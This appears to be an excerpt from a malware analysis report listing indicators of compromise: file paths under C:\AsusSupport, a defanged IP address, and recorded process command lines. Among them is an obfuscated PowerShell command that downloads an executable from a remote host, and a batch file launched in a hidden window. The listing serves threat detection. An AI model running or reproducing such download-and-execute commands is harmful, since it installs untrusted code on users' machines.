Technical Information
- 'C:\asussupport\kilskhdeuyrg.exe'
- <SYSTEM32>\wermgr.exe
- C:\asussupport\kreuitrsfyrgryfvft5.cmd
- C:\asussupport\kilskhdeuyrg.exe
- %TEMP%\logc526.tmp
- http://18#.#42.99.32/img.php
- '<SYSTEM32>\cmd.exe' /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://18#.#42.99.32/img.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
- '<SYSTEM32>\wermgr.exe'
- '<SYSTEM32>\timeout.exe' /T 10